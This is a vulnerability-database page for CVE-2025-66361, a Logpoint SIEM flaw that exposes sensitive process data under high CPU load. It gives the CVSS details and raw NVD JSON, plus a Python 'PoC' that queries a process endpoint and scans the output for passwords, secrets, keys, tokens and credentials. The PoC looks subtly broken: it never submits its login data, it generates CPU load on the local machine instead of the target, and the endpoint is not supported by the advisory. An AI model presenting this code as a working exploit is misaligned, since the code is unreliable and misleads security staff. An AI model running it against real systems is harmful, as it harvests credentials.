Security Vulnerability Report
中文
CVE-2025-66361 CVSS 6.5 MEDIUM

CVE-2025-66361

Published: 2025-11-28 00:15:46
Last Modified: 2025-12-03 19:15:04
Source: [email protected]

Description

An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:* - VULNERABLE
Logpoint < 7.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66361 PoC - Logpoint Sensitive Information Exposure # This PoC demonstrates the information disclosure vulnerability # Environment: Logpoint < 7.7.0 during high CPU load import requests import time import subprocess import json # Configuration LOGPOINT_HOST = "https://target-logpoint-server.com" USERNAME = "low_privilege_user" PASSWORD = "password" def create_high_cpu_load(): """Generate high CPU load on target system""" # This would be executed on the target system # to trigger the vulnerability condition print("[*] Generating high CPU load to trigger vulnerability...") subprocess.Popen(["stress", "-c", "4", "-t", "300"]) def extract_sensitive_process_info(): """Extract sensitive information from system processes""" print("[*] Extracting process information from Logpoint...") # Authenticate to Logpoint session = requests.Session() auth_data = { "username": USERNAME, "password": PASSWORD } # Get system process list (vulnerable endpoint) # In affected versions, this may expose sensitive data response = session.get( f"{LOGPOINT_HOST}/api/v1/system/processes", verify=False ) if response.status_code == 200: processes = response.json() sensitive_data = [] # Look for sensitive patterns in process data for proc in processes: if any(keyword in str(proc).lower() for keyword in ['password', 'secret', 'key', 'token', 'credential']): sensitive_data.append(proc) if sensitive_data: print(f"[!] Found {len(sensitive_data)} processes with sensitive data") print(json.dumps(sensitive_data, indent=2)) return sensitive_data return None def main(): print("=" * 60) print("CVE-2025-66361 - Logpoint Information Disclosure PoC") print("=" * 60) # Step 1: Trigger high CPU load create_high_cpu_load() time.sleep(30) # Wait for CPU load to build up # Step 2: Extract sensitive information sensitive_data = extract_sensitive_process_info() if sensitive_data: print("\n[+] Vulnerability confirmed - sensitive data exposed") else: print("\n[-] No sensitive data found (may need higher CPU load)") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66361", "sourceIdentifier": "[email protected]", "published": "2025-11-28T00:15:46.430", "lastModified": "2025-12-03T19:15:03.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.7.0", "matchCriteriaId": "D6A6E475-FAB2-42A4-9805-F137CDBDEB61"}]}]}], "references": [{"url": "https://servicedesk.logpoint.com/hc/en-us/articles/29160993806749-Process-Data-Exposure-Under-High-Load", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.